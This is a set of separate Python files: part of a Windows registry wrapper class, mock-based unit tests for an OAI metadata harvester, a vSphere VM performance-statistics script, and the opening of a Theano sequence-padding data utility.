self.__key = _winreg.OpenKey(key.__key, subkey)
elif isinstance(key, (int, _winreg.HKEYType)) and subkey is None and isinstance(mode, int) and computer is None:
self.__key = _winreg.OpenKey(key, '', 0, mode)
elif isinstance(key, Key) and subkey is None and isinstance(mode, int) and computer is None:
self.__key = _winreg.OpenKey(key.__key, '', 0, mode)
elif isinstance(key, (int, _winreg.HKEYType)) and isinstance(subkey, str) and isinstance(mode, int) and computer is None:
self.__key = _winreg.OpenKey(key, subkey, 0, mode)
elif isinstance(key, Key) and isinstance(subkey, str) and isinstance(mode, int) and computer is None:
self.__key = _winreg.OpenKey(key.__key, subkey, 0, mode)
elif isinstance(key, int) and subkey is None and mode is None and isinstance(computer, str):
self.__key = _winreg.ConnectRegistry(computer, key)
elif isinstance(key, int) and isinstance(subkey, str) and mode is None and isinstance(computer, str):
self.__key = _winreg.OpenKey(_winreg.ConnectRegistry(computer, key), subkey)
elif isinstance(key, int) and subkey is None and isinstance(mode, int) and isinstance(computer, str):
self.__key = _winreg.OpenKey(_winreg.ConnectRegistry(computer, key), '', 0, mode)
elif isinstance(key, int) and isinstance(subkey, str) and isinstance(mode, int) and isinstance(computer, str):
self.__key = _winreg.OpenKey(_winreg.ConnectRegistry(computer, key), subkey, 0, mode)
else:
raise TypeError, 'Please check documentation.'
self.__keys = Keys(self.__key)
self.__values = Values(self.__key)
self.__repr = 'Key(%s)' % ', '.join([repr(key)] + ['%s=%r' % (key, value) for key, value in zip(('subkey', 'mode', 'computer'), (subkey, mode, computer)) if value is not None])
def __repr__(self):
'Return the object\'s representation.'
return self.__repr
def save(self, file_name):
'Save this key to file.'
_winreg.SaveKey(self.__key, file_name)
def load(self, subkey, file_name):
'Load subkey from file.'
_winreg.LoadKey(self.__key, subkey, file_name)
def __get_keys(self):
'Private class method.'
return self.__keys
def __set_keys(self, keys):
'Private class method.'
if isinstance(keys, str):
_winreg.CreateKey(self.__key, keys)
elif isinstance(keys, (list, tuple)):
for key in keys:
self.keys = key
else:
raise TypeError, 'Key Could Not Be Created'
def __del_keys(self):
'Private class method.'
try:
while True:
_winreg.DeleteKey(self.__key, _winreg.EnumKey(self.__key, 0))
except EnvironmentError:
pass
def __get_values(self):
'Private class method.'
return self.__values
def __set_values(self, values):
'Private class method.'
if isinstance(values, str):
_winreg.SetValueEx(self.__key, values, 0, REG.SZ, _winreg.QueryValue(self.__key, ''))
elif isinstance(values, (list, tuple)):
for value in values:
self.values = value
else:
raise TypeError, 'Value Could Not Be Created'
def __del_values(self):
'Private class method.'
try:
while True:
_winreg.DeleteValue(self.__key, _winreg.EnumValue(self.__key, 0)[0])
except EnvironmentError:
pass
def __get_value(self):
'Private class method.'
return _winreg.QueryValue(self.__key, '')
def __set_value(self, value):
'Private class method.'
_winreg.SetValue(self.__key, '', REG.SZ, value)
def __del_value(self):
'Private class method.'
_winreg.DeleteValue(self.__key, '')
def __get_info(self):
'Private class method.'
return Info(*_winreg.QueryInfoKey(self.__key))
keys = property(__get_keys, __set_keys, __del_keys, 'Keys of this key.')
values = property(__get_values, __set_values, __del_values, 'Values of this key.')
value = property(__get_value, __set_value, __del_value, 'Value of this key.')
info = property(__get_info, doc='Information about this key.')
################################################################################
class Keys(object):
'Keys(key) -> Keys'
def __init__(self, key):
'Initialize the Keys object.'
self.__key = key
self.__repr = 'Keys(%r)' % key
def __repr__(self):
'Return the object\'s representation.'
return self.__repr
def __len__(self):
'Return the number of keys.'
return _winreg.QueryInfoKey(self.__key)[0]
def __getitem__(self, key):
'Return the specified key.'
return Key(self.__key, key)
def __setitem__(self, key, value):
'Assign the item to a key.'
key = Key(_winreg.CreateKey(self.__key, key), mode=KEY.ALL_ACCESS)
for name in value.values:
key.values[name] = value.values[name]
for name in value.keys:
key.keys[name] = value.keys[name]
def __delitem__(self, key):
'Delete the specified key.'
_winreg.DeleteKey(self.__key, key)
def __iter__(self):
'Iterate over the key names.'
return iter(tuple(_winreg.EnumKey(self.__key, index) for index in xrange(_winreg.QueryInfoKey(self.__key)[0])))
def __contains__(self, item):
'Check for a key\'s existence.'
item = item.lower()
for index in xrange(_winreg.QueryInfoKey(self.__key)[0]):
if _winreg.EnumKey(self.__key, index).lower() == item:
return True
return False
################################################################################
class Values(object):
'Values(key) -> Values'
TYPES = REG_NONE, REG_SZ, REG_EXPAND_SZ, REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_RESOURCE_LIST, REG_FULL_RESOURCE_DESCRIPTOR, REG_RESOURCE_REQUIREMENTS_LIST, REG_QWORD
def __init__(self, key):
'Initialize the Values object.'
self.__key = key
self.__repr = 'Values(%r)' % key
def __repr__(self):
'Return the object\'s representation.'
return self.__repr
def __len__(self):
'Return the number of values.'
return _winreg.QueryInfoKey(self.__key)[1]
def __getitem__(self, key):
'Return the specified value.'
item_value, item_type = _winreg.QueryValueEx(self.__key, key)
return self.TYPES[item_type](item_value)
def __setitem__(self, key, value):
'Assign the item to a value.'
if isinstance(value, self.TYPES):
_winreg.SetValueEx(self.__key, key, 0, list(self.TYPES).index(value.__class__), value.value)
else:
_winreg.SetValueEx(self.__key, key, 0, _winreg.QueryValueEx(self.__key, key)[1], value)
def __delitem__(self, key):
'Delete the specified value.'
_winreg.DeleteValue(self.__key, key)
def __iter__(self):
'Iterate over the value names.'
return iter(tuple(_winreg.EnumValue(self.__key, index)[0] for index in xrange(_winreg.QueryInfoKey(self.__key)[1])))
def __contains__(self, item):
'Check for a value\'s existence.'
item = item.lower()
for index in xrange(_winreg.QueryInfoKey(self.__key)[1]):
if _winreg.EnumValue(self.__key, index)[0].lower() == item:
return True
return False
################################################################################
class Info(object):
'Info(keys, values, modified) -> Info'
def __init__(self, keys, values, modified):
'Initialize the Info object.'
self.__keys = keys
self.__values = values
self.__modified = modified
self.__repr = 'Info(%r, %r, %r)' % (keys, values, modified)
def __repr__(self):
'Return the object\'s representation.'
return self.__repr
def __get_keys(self):
'Private class method.'
return self.__keys
def __get_values(self):
'Private class method.'
return self.__values
def __get_modified(self):
'Private class method.'
return self.__modified
def __get_difference(self):
'Private class method.'
return _time.time() + 11644473600.0 - self.__modified / 10000000.0
keys = property(__get_keys, doc='Number of keys.')
values = property(__get_values, doc='Number of values.')
modified = property(__get_modified, doc='Time last modified.')
difference = property(__get_difference, doc='Seconds since modified.')
################################################################################
if __name__ == '__main__':
_sys.stdout.write('Content-Type: text/plain\n\n')
_sys.stdout.write(file(_sys.argv[0]).read())
| |
import unittest
from datetime import datetime
import logging
import mock
from ..util import LogCapture
from ...exception import HarvestError
from ...importer import harvest
def make_item(identifier):
item = mock.Mock()
item.identifier = identifier
return item
def make_format(prefix):
format_ = mock.Mock()
format_.prefix = prefix
return format_
class TestUpdateFormats(unittest.TestCase):
def test_successful_update(self):
formats = {
'oai_dc': (
'http://www.openarchives.org/OAI/2.0/oai_dc/',
u'http://www.openarchives.org/OAI/2.0/oai_dc.xsd',
),
u'ddi': (
'http://www.icpsr.umich.edu/DDI/Version2-0',
'http://www.icpsr.umich.edu/DDI/Version2-0.dtd',
),
}
oai_dc_mock = make_format(u'oai_dc')
ead_mock = make_format(u'ead')
provider = mock.Mock()
provider.formats.return_value = formats
with LogCapture(harvest) as log:
with mock.patch.object(harvest, 'models') as models:
models.Format.list.return_value = [oai_dc_mock, ead_mock]
new_prefixes = harvest.update_formats(provider, purge=True)
self.assertItemsEqual(new_prefixes, formats.keys())
self.assertEqual(oai_dc_mock.mark_as_deleted.mock_calls, [])
ead_mock.mark_as_deleted.assert_called_once_with()
models.Format.list.assert_called_once_with(ignore_deleted=True)
self.assertItemsEqual(
models.Format.create_or_update.mock_calls,
[mock.call(p, n, s) for p, (n, s) in formats.iteritems()]
)
models.purge_deleted.assert_called_once_with()
provider.formats.assert_called_once_with()
models.commit.assert_called_once_with()
log.assert_emitted('Removed 1 format and added 1 format.')
def test_no_formats(self):
provider = mock.Mock()
provider.formats.return_value = {}
with self.assertRaises(HarvestError) as cm:
harvest.update_formats(provider)
self.assertIn('no formats', cm.exception.message)
def test_provider_fails(self):
provider = mock.Mock()
provider.formats.side_effect = ImportError('some message')
with LogCapture(harvest) as log:
with self.assertRaises(HarvestError) as cm:
harvest.update_formats(provider)
self.assertIn('some message', cm.exception.message)
log.assert_emitted('Failed to update metadata formats')
def test_invalid_format(self):
provider = mock.Mock()
provider.formats.return_value = {'prefix': 'invalid'}
self.assertRaises(HarvestError, harvest.update_formats, provider)
def test_dry_run(self):
provider = mock.Mock()
provider.formats.return_value = {'oai_dc': ('namespace', 'schema')}
with LogCapture(harvest) as log:
with mock.patch.object(harvest, 'models') as models:
models.Format.list.return_value = []
harvest.update_formats(provider, purge=True, dry_run=True)
self.assertEqual(models.Format.create_or_update.mock_calls, [])
self.assertEqual(models.purge_deleted.mock_calls, [])
self.assertEqual(models.commit.mock_calls, [])
log.assert_emitted('Removed 0 formats and added 1 format.')
class TestUpdateItems(unittest.TestCase):
def test_successful_update(self):
identifiers = ['asd', u'U', 'a:b']
provider = mock.Mock()
provider.identifiers.return_value = identifiers
item_mocks = [make_item(u'1234'), make_item(u'asd')]
with LogCapture(harvest) as log:
with mock.patch.object(harvest, 'models') as models:
models.Item.list.return_value = item_mocks
new_ids = harvest.update_items(provider, purge=True)
self.assertItemsEqual(new_ids, identifiers)
provider.identifiers.assert_called_once_with()
item_mocks[0].mark_as_deleted.assert_called_once_with()
self.assertEqual(item_mocks[1].mark_as_deleted.mock_calls, [])
self.assertItemsEqual(
models.Item.create_or_update.mock_calls,
[mock.call(i) for i in ['asd', u'U', 'a:b']]
)
models.purge_deleted.assert_called_once_with()
models.commit.assert_called_once_with()
log.assert_emitted('Removed 1 item and added 2 items.')
def test_no_identifiers(self):
provider = mock.Mock()
provider.identifiers.return_value = []
item_mock = make_item(u'id')
with mock.patch.object(harvest, 'models') as models:
models.Item.list.return_value = [item_mock]
harvest.update_items(provider, purge=False)
item_mock.mark_as_deleted.assert_called_once_with()
def test_provider_fails(self):
provider = mock.Mock()
provider.identifiers.side_effect = ValueError('abcabc')
with self.assertRaises(HarvestError) as cm:
harvest.update_items(provider)
self.assertIn('abcabc', cm.exception.message)
def test_duplicate_identifiers(self):
provider = mock.Mock()
provider.identifiers.return_value = [
'i2', 'i1', 'i3', 'i1', 'i1', 'i2',
]
with mock.patch.object(harvest, 'models') as models:
models.Item.list.return_value = []
new_ids = harvest.update_items(provider, purge=False)
self.assertItemsEqual(
models.Item.create_or_update.mock_calls,
[mock.call(i) for i in ['i1', 'i2', 'i3']]
)
self.assertItemsEqual(new_ids, ['i1', 'i2', 'i3'])
def test_invalid_identifiers(self):
class InvalidId(object):
def __unicode__(self):
raise TypeError('conversion failed')
provider = mock.Mock()
provider.identifiers.return_value = [
'ok', InvalidId(), 'oai:1234',
]
with mock.patch.object(harvest, 'models') as models:
models.Item.list.return_value = []
with self.assertRaises(HarvestError) as cm:
harvest.update_items(provider)
self.assertIn('conversion failed', cm.exception.message)
def test_dry_run(self):
provider = mock.Mock()
provider.identifiers.return_value = ['asd']
item_mock = make_item(u'1234')
with LogCapture(harvest) as log:
with mock.patch.object(harvest, 'models') as models:
models.Item.list.return_value = [item_mock]
harvest.update_items(provider, purge=True, dry_run=True)
self.assertEqual(models.Item.create_or_update.mock_calls, [])
self.assertEqual(models.purge_deleted.mock_calls, [])
self.assertEqual(models.commit.mock_calls, [])
self.assertEqual(item_mock.mark_as_deleted.mock_calls, [])
log.assert_emitted('Removed 1 item and added 1 item.')
class TestUpdateRecords(unittest.TestCase):
def test_successful_harvest(self):
prefixes = [u'ead', u'oai_dc']
identifiers = [u'item{0}'.format(i) for i in xrange(4)]
time = datetime(2014, 2, 4, 10, 54, 27)
provider = mock.Mock()
provider.get_record.return_value = '<xml ... />'
provider.has_changed.side_effect = (
lambda identifier, _: identifier != u'item2'
)
with LogCapture(harvest) as log:
with mock.patch.object(harvest, 'models') as models:
with mock.patch.object(harvest, 'update_sets') as (
update_sets_mock):
harvest.update_records(
provider, identifiers, prefixes, time)
self.assertItemsEqual(
provider.get_record.mock_calls,
[mock.call(id_, prefix)
for id_ in [u'item0', u'item1', u'item3']
for prefix in [u'ead', u'oai_dc']]
)
self.assertItemsEqual(
update_sets_mock.mock_calls,
[mock.call(provider, id_, False)
for id_ in [u'item0', u'item1', u'item3']],
)
self.assertItemsEqual(
models.Record.create_or_update.mock_calls,
[mock.call(id_, prefix, '<xml ... />')
for id_ in [u'item0', u'item1', u'item3']
for prefix in [u'ead', u'oai_dc']]
)
self.assertEqual(
models.commit.mock_calls,
[mock.call() for _ in xrange(6)]
)
log.assert_emitted('Skipping item "item2"')
log.assert_emitted('Updated 6 records.')
def test_no_time(self):
prefixes = [u'oai_dc']
items = [u'oai:test:id']
provider = mock.Mock()
provider.get_record.return_value = '<oai_dc:dc>...</oai_dc:dc>'
with mock.patch.object(harvest, 'update_sets'):
with mock.patch.object(harvest, 'models') as models:
harvest.update_records(
provider, items, prefixes, since=None)
self.assertEqual(provider.has_changed.mock_calls, [])
provider.get_record.assert_called_once_with(
u'oai:test:id', u'oai_dc')
def test_no_records(self):
provider = mock.Mock()
time = datetime(2014, 2, 4, 10, 54, 27)
with mock.patch.object(harvest, 'models') as models:
harvest.update_records(provider, [], [u'ead'], since=time)
self.assertEqual(provider.has_changed.mock_calls, [])
self.assertEqual(provider.get_record.mock_calls, [])
self.assertEqual(models.commit.mock_calls, [])
def test_harvest_fails(self):
items = ['id1', 'id2']
xml = 'data'
def get_record(id_, prefix):
if id_ == 'id1':
raise ValueError('crosswalk error')
else:
return xml
provider = mock.Mock()
provider.get_record.side_effect = get_record
with mock.patch.object(harvest, 'update_sets'):
with mock.patch.object(harvest, 'models') as models:
with LogCapture(harvest) as log:
harvest.update_records(provider, items, [u'ead'])
models.Record.create_or_update.assert_called_once_with(
'id2', 'ead', xml)
log.assert_emitted(
'Failed to disseminate format "ead" for item "id1"')
log.assert_emitted('crosswalk error')
def test_deleted_record(self):
provider = mock.Mock()
provider.get_record.return_value = None
with mock.patch.object(harvest, 'update_sets'):
with mock.patch.object(harvest, 'models') as models:
harvest.update_records(
provider, [u'some_item'], [u'oai_dc'])
models.Record.mark_as_deleted.assert_called_once_with(
u'some_item', u'oai_dc',
)
def test_update_sets_fails(self):
items = [u'item1', u'item2']
provider = mock.Mock()
provider.get_record.return_value = '<oai_dc:dc>...</oai_dc:dc>'
with mock.patch.object(harvest, 'update_sets') as (
update_sets_mock):
update_sets_mock.side_effect = ValueError('invalid set spec')
with mock.patch.object(harvest, 'models') as models:
with LogCapture(harvest) as log:
harvest.update_records(provider, items, [u'oai_dc'])
self.assertItemsEqual(
update_sets_mock.mock_calls,
[mock.call(provider, id_, False)
for id_ in [u'item1', u'item2']],
)
log.assert_emitted('Failed to update item "item1"')
log.assert_emitted('Failed to update item "item2"')
log.assert_emitted('invalid set spec')
def test_delete_single_record(self):
formats = [u'oai_dc', u'ead', u'ddi']
def get_record(id_, prefix):
if prefix == u'oai_dc':
raise ValueError('invalid data')
elif prefix == u'ead':
return None
elif prefix == u'ddi':
return 'data'
provider = mock.Mock()
provider.get_record.side_effect = get_record
provider.get_sets.return_value = []
with mock.patch.object(harvest, 'models') as models:
harvest.update_records(provider, [u'pelle'], formats)
models.Record.mark_as_deleted.assert_called_once_with(
u'pelle', u'ead')
models.Record.create_or_update.assert_called_once_with(
u'pelle', u'ddi', 'data')
def test_dry_run(self):
time = datetime(2014, 2, 4, 10, 54, 27)
provider = mock.Mock()
provider.get_record.return_value = '<xml ... />'
provider.has_changed.return_value = True
with LogCapture(harvest) as log:
with mock.patch.object(harvest, 'models') as models:
with mock.patch.object(harvest, 'update_sets') as (
update_sets_mock):
harvest.update_records(
provider,
['item1'],
['oai_dc'],
time,
dry_run=True,
)
update_sets_mock.assert_called_once_with(provider, u'item1', True)
self.assertEqual(models.Record.create_or_update.mock_calls, [])
self.assertEqual(models.commit.mock_calls, [])
log.assert_emitted('Updated 1 record.')
class TestUpdateSets(unittest.TestCase):
def test_valid_sets(self):
provider = mock.Mock()
provider.get_sets.return_value = [
(u'a:b', 'Set B'),
('a', u'Set A'),
('a:b:c','Set C'),
]
with mock.patch.object(harvest, 'models') as models:
harvest.update_sets(provider, 'oai:example.org:item')
models.Item.get.assert_called_once_with('oai:example.org:item')
item = models.Item.get.return_value
item.clear_sets.assert_called_once_with()
self.assertEqual(
models.Set.create_or_update.mock_calls,
[mock.call('a', u'Set A'),
mock.call(u'a:b', 'Set B'),
mock.call('a:b:c', 'Set C')]
)
set_ = models.Set.create_or_update.return_value
self.assertEqual(
item.add_to_set.mock_calls,
[mock.call(set_) for _ in xrange(3)]
)
def test_no_sets(self):
provider = mock.Mock()
provider.get_sets.return_value = []
with mock.patch.object(harvest, 'models') as models:
harvest.update_sets(provider, 'item')
item = models.Item.get.return_value
item.clear_sets.assert_called_once_with()
self.assertEqual(item.add_to_set.mock_calls, [])
def test_dry_run(self):
provider = mock.Mock()
provider.get_sets.return_value = [(u'a', 'Set Name')]
with mock.patch.object(harvest, 'models') as models:
models.Item
harvest.update_sets(
provider,
'oai:example.org:item',
dry_run=True,
)
item_mock = models.Item.get.return_value
self.assertEqual(item_mock.clear_sets.mock_calls, [])
self.assertEqual(models.Set.create_or_update.mock_calls, [])
self.assertEqual(item_mock.add_to_set.mock_calls, [])
| |
#!/usr/bin/env python
"""
Python program that generates various statistics for one or more virtual machines
A list of virtual machines can be provided as a comma separated list.
"""
from __future__ import print_function
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vmodl, vim
from datetime import timedelta, datetime
import argparse
import atexit
import getpass
import ssl
def GetArgs():
"""
Supports the command-line arguments listed below.
"""
parser = argparse.ArgumentParser(description='Process args for retrieving all the Virtual Machines')
parser.add_argument('-s', '--host', required=True, action='store', help='Remote host to connect to')
parser.add_argument('-o', '--port', type=int, default=443, action='store', help='Port to connect on')
parser.add_argument('-u', '--user', required=True, action='store', help='User name to use when connecting to host')
parser.add_argument('-p', '--password', required=False, action='store',
help='Password to use when connecting to host')
parser.add_argument('-m', '--vm', required=True, action='store', help='On eor more Virtual Machines to report on')
parser.add_argument('-c', '--cert_check_skip', required=False, action='store_true', help='skip ssl certificate check')
parser.add_argument('-i', '--interval', type=int, default=15, action='store',
help='Interval to average the vSphere stats over')
args = parser.parse_args()
return args
def BuildQuery(content, vchtime, counterId, instance, vm, interval):
perfManager = content.perfManager
metricId = vim.PerformanceManager.MetricId(counterId=counterId, instance=instance)
startTime = vchtime - timedelta(minutes=(interval + 1))
endTime = vchtime - timedelta(minutes=1)
query = vim.PerformanceManager.QuerySpec(intervalId=20, entity=vm, metricId=[metricId], startTime=startTime,
endTime=endTime)
perfResults = perfManager.QueryPerf(querySpec=[query])
if perfResults:
return perfResults
else:
print('ERROR: Performance results empty. TIP: Check time drift on source and vCenter server')
print('Troubleshooting info:')
print('vCenter/host date and time: {}'.format(vchtime))
print('Start perf counter time : {}'.format(startTime))
print('End perf counter time : {}'.format(endTime))
print(query)
exit()
def PrintVmInfo(vm, content, vchtime, interval, perf_dict, ):
statInt = interval * 3 # There are 3 20s samples in each minute
summary = vm.summary
disk_list = []
network_list = []
# Convert limit and reservation values from -1 to None
if vm.resourceConfig.cpuAllocation.limit == -1:
vmcpulimit = "None"
else:
vmcpulimit = "{} Mhz".format(vm.resourceConfig.cpuAllocation.limit)
if vm.resourceConfig.memoryAllocation.limit == -1:
vmmemlimit = "None"
else:
vmmemlimit = "{} MB".format(vm.resourceConfig.memoryAllocation.limit)
if vm.resourceConfig.cpuAllocation.reservation == 0:
vmcpures = "None"
else:
vmcpures = "{} Mhz".format(vm.resourceConfig.cpuAllocation.reservation)
if vm.resourceConfig.memoryAllocation.reservation == 0:
vmmemres = "None"
else:
vmmemres = "{} MB".format(vm.resourceConfig.memoryAllocation.reservation)
vm_hardware = vm.config.hardware
for each_vm_hardware in vm_hardware.device:
if (each_vm_hardware.key >= 2000) and (each_vm_hardware.key < 3000):
disk_list.append('{} | {:.1f}GB | Thin: {} | {}'.format(each_vm_hardware.deviceInfo.label,
each_vm_hardware.capacityInKB/1024/1024,
each_vm_hardware.backing.thinProvisioned,
each_vm_hardware.backing.fileName))
elif (each_vm_hardware.key >= 4000) and (each_vm_hardware.key < 5000):
network_list.append('{} | {} | {}'.format(each_vm_hardware.deviceInfo.label,
each_vm_hardware.deviceInfo.summary,
each_vm_hardware.macAddress))
#CPU Ready Average
statCpuReady = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'cpu.ready.summation')), "", vm, interval)
cpuReady = (float(sum(statCpuReady[0].value[0].value)) / statInt)
#CPU Usage Average % - NOTE: values are type LONG so needs divided by 100 for percentage
statCpuUsage = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'cpu.usage.average')), "", vm, interval)
cpuUsage = ((float(sum(statCpuUsage[0].value[0].value)) / statInt) / 100)
#Memory Active Average MB
statMemoryActive = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'mem.active.average')), "", vm, interval)
memoryActive = (float(sum(statMemoryActive[0].value[0].value) / 1024) / statInt)
#Memory Shared
statMemoryShared = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'mem.shared.average')), "", vm, interval)
memoryShared = (float(sum(statMemoryShared[0].value[0].value) / 1024) / statInt)
#Memory Balloon
statMemoryBalloon = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'mem.vmmemctl.average')), "", vm, interval)
memoryBalloon = (float(sum(statMemoryBalloon[0].value[0].value) / 1024) / statInt)
#Memory Swapped
statMemorySwapped = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'mem.swapped.average')), "", vm, interval)
memorySwapped = (float(sum(statMemorySwapped[0].value[0].value) / 1024) / statInt)
#Datastore Average IO
statDatastoreIoRead = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'datastore.numberReadAveraged.average')),
"*", vm, interval)
DatastoreIoRead = (float(sum(statDatastoreIoRead[0].value[0].value)) / statInt)
statDatastoreIoWrite = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'datastore.numberWriteAveraged.average')),
"*", vm, interval)
DatastoreIoWrite = (float(sum(statDatastoreIoWrite[0].value[0].value)) / statInt)
#Datastore Average Latency
statDatastoreLatRead = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'datastore.totalReadLatency.average')),
"*", vm, interval)
DatastoreLatRead = (float(sum(statDatastoreLatRead[0].value[0].value)) / statInt)
statDatastoreLatWrite = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'datastore.totalWriteLatency.average')),
"*", vm, interval)
DatastoreLatWrite = (float(sum(statDatastoreLatWrite[0].value[0].value)) / statInt)
#Network usage (Tx/Rx)
statNetworkTx = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'net.transmitted.average')), "", vm, interval)
networkTx = (float(sum(statNetworkTx[0].value[0].value) * 8 / 1024) / statInt)
statNetworkRx = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'net.received.average')), "", vm, interval)
networkRx = (float(sum(statNetworkRx[0].value[0].value) * 8 / 1024) / statInt)
print('\nNOTE: Any VM statistics are averages of the last {} minutes\n'.format(statInt / 3))
print('Server Name :', summary.config.name)
print('Description :', summary.config.annotation)
print('Guest :', summary.config.guestFullName)
if vm.rootSnapshot:
print('Snapshot Status : Snapshots present')
else:
print('Snapshot Status : No Snapshots')
print('VM .vmx Path :', summary.config.vmPathName)
try:
print('Virtual Disks :', disk_list[0])
if len(disk_list) > 1:
disk_list.pop(0)
for each_disk in disk_list:
print(' ', each_disk)
except IndexError:
pass
print('Virtual NIC(s) :', network_list[0])
if len(network_list) > 1:
network_list.pop(0)
for each_vnic in network_list:
print(' ', each_vnic)
print('[VM] Limits : CPU: {}, Memory: {}'.format(vmcpulimit, vmmemlimit))
print('[VM] Reservations : CPU: {}, Memory: {}'.format(vmcpures, vmmemres))
print('[VM] Number of vCPUs :', summary.config.numCpu)
print('[VM] CPU Ready : Average {:.1f} %, Maximum {:.1f} %'.format((cpuReady / 20000 * 100),
((float(max(
statCpuReady[0].value[
0].value)) / 20000 * 100))))
print('[VM] CPU (%) : {:.0f} %'.format(cpuUsage))
print('[VM] Memory : {} MB ({:.1f} GB)'.format(summary.config.memorySizeMB, (float(summary.config.memorySizeMB) / 1024)))
print('[VM] Memory Shared : {:.0f} %, {:.0f} MB'.format(
((memoryShared / summary.config.memorySizeMB) * 100), memoryShared))
print('[VM] Memory Balloon : {:.0f} %, {:.0f} MB'.format(
((memoryBalloon / summary.config.memorySizeMB) * 100), memoryBalloon))
print('[VM] Memory Swapped : {:.0f} %, {:.0f} MB'.format(
((memorySwapped / summary.config.memorySizeMB) * 100), memorySwapped))
print('[VM] Memory Active : {:.0f} %, {:.0f} MB'.format(
((memoryActive / summary.config.memorySizeMB) * 100), memoryActive))
print('[VM] Datastore Average IO : Read: {:.0f} IOPS, Write: {:.0f} IOPS'.format(DatastoreIoRead,
DatastoreIoWrite))
print('[VM] Datastore Average Latency : Read: {:.0f} ms, Write: {:.0f} ms'.format(DatastoreLatRead,
DatastoreLatWrite))
print('[VM] Overall Network Usage : Transmitted {:.3f} Mbps, Received {:.3f} Mbps'.format(networkTx, networkRx))
print('[Host] Name : {}'.format(summary.runtime.host.name))
print('[Host] CPU Detail : Processor Sockets: {}, Cores per Socket {}'.format(
summary.runtime.host.summary.hardware.numCpuPkgs,
(summary.runtime.host.summary.hardware.numCpuCores / summary.runtime.host.summary.hardware.numCpuPkgs)))
print('[Host] CPU Type : {}'.format(summary.runtime.host.summary.hardware.cpuModel))
print('[Host] CPU Usage : Used: {} Mhz, Total: {} Mhz'.format(
summary.runtime.host.summary.quickStats.overallCpuUsage,
(summary.runtime.host.summary.hardware.cpuMhz * summary.runtime.host.summary.hardware.numCpuCores)))
print('[Host] Memory Usage : Used: {:.0f} GB, Total: {:.0f} GB\n'.format(
(float(summary.runtime.host.summary.quickStats.overallMemoryUsage) / 1024),
(float(summary.runtime.host.summary.hardware.memorySize) / 1024 / 1024 / 1024)))
def StatCheck(perf_dict, counter_name):
counter_key = perf_dict[counter_name]
return counter_key
def GetProperties(content, viewType, props, specType):
# Build a view and get basic properties for all Virtual Machines
objView = content.viewManager.CreateContainerView(content.rootFolder, viewType, True)
tSpec = vim.PropertyCollector.TraversalSpec(name='tSpecName', path='view', skip=False, type=vim.view.ContainerView)
pSpec = vim.PropertyCollector.PropertySpec(all=False, pathSet=props, type=specType)
oSpec = vim.PropertyCollector.ObjectSpec(obj=objView, selectSet=[tSpec], skip=False)
pfSpec = vim.PropertyCollector.FilterSpec(objectSet=[oSpec], propSet=[pSpec], reportMissingObjectsInResults=False)
retOptions = vim.PropertyCollector.RetrieveOptions()
totalProps = []
retProps = content.propertyCollector.RetrievePropertiesEx(specSet=[pfSpec], options=retOptions)
totalProps += retProps.objects
while retProps.token:
retProps = content.propertyCollector.ContinueRetrievePropertiesEx(token=retProps.token)
totalProps += retProps.objects
objView.Destroy()
# Turn the output in retProps into a usable dictionary of values
gpOutput = []
for eachProp in totalProps:
propDic = {}
for prop in eachProp.propSet:
propDic[prop.name] = prop.val
propDic['moref'] = eachProp.obj
gpOutput.append(propDic)
return gpOutput
def main():
args = GetArgs()
try:
vmnames = args.vm
si = None
if args.password:
password = args.password
else:
password = getpass.getpass(prompt="Enter password for host {} and user {}: ".format(args.host, args.user))
try:
if args.cert_check_skip:
context = ssl._create_unverified_context()
si = SmartConnect(host=args.host,
user=args.user,
pwd=password,
port=int(args.port),
sslContext=context)
else:
si = SmartConnect(host=args.host,
user=args.user,
pwd=password,
port=int(args.port))
except IOError as e:
pass
if not si:
print('Could not connect to the specified host using specified username and password')
return -1
atexit.register(Disconnect, si)
content = si.RetrieveContent()
# Get vCenter date and time for use as baseline when querying for counters
vchtime = si.CurrentTime()
# Get all the performance counters
perf_dict = {}
perfList = content.perfManager.perfCounter
for counter in perfList:
counter_full = "{}.{}.{}".format(counter.groupInfo.key, counter.nameInfo.key, counter.rollupType)
perf_dict[counter_full] = counter.key
retProps = GetProperties(content, [vim.VirtualMachine], ['name', 'runtime.powerState'], vim.VirtualMachine)
#Find VM supplied as arg and use Managed Object Reference (moref) for the PrintVmInfo
for vm in retProps:
if (vm['name'] in vmnames) and (vm['runtime.powerState'] == "poweredOn"):
PrintVmInfo(vm['moref'], content, vchtime, args.interval, perf_dict)
elif vm['name'] in vmnames:
print('ERROR: Problem connecting to Virtual Machine. {} is likely powered off or suspended'.format(vm['name']))
except vmodl.MethodFault as e:
print('Caught vmodl fault : ' + e.msg)
return -1
except Exception as e:
print('Caught exception : ' + str(e))
return -1
return 0
# Start program
if __name__ == "__main__":
main()
| |
from __future__ import print_function
from six.moves import xrange
import six.moves.cPickle as pickle
import gzip
import os
import numpy
import theano
def prepare_data(seqs, labels, maxlen=None):
"""Create the matrices from the datasets.
This pad each sequence to the same lenght: the lenght of the
longuest sequence or maxlen.
if maxlen is set, we will cut all sequence to this maximum
lenght.
This swap the axis!
"""
# x: a list of sentences
lengths = [len(s) for s in seqs]
if maxlen is not None:
new_seqs = []
new_labels = []
new_lengths = []
for l, s, y in zip(lengths, seqs, labels):
if l < maxlen:
new_seqs.append(s)
new_labels.append(y)
new_lengths.append(l)
lengths = new_lengths
labels = new_labels
seqs = new_seqs
if len(lengths) < 1:
return None, None, None
n_samples = len(seqs)
maxlen = numpy.max(lengths)
x = numpy.zeros((maxlen, n_samples)).astype('int64')
x_mask = numpy.zeros((maxlen, n_samples)).astype(theano.config.floatX)
for idx, s in enumerate(seqs):
x[:lengths[idx], idx] = s
x_mask[:lengths[idx], idx] = 1.
return x, x_mask, labels
def get_dataset_file(dataset, default_dataset, origin):
'''Look for it as if it was a full path, if not, try local file,
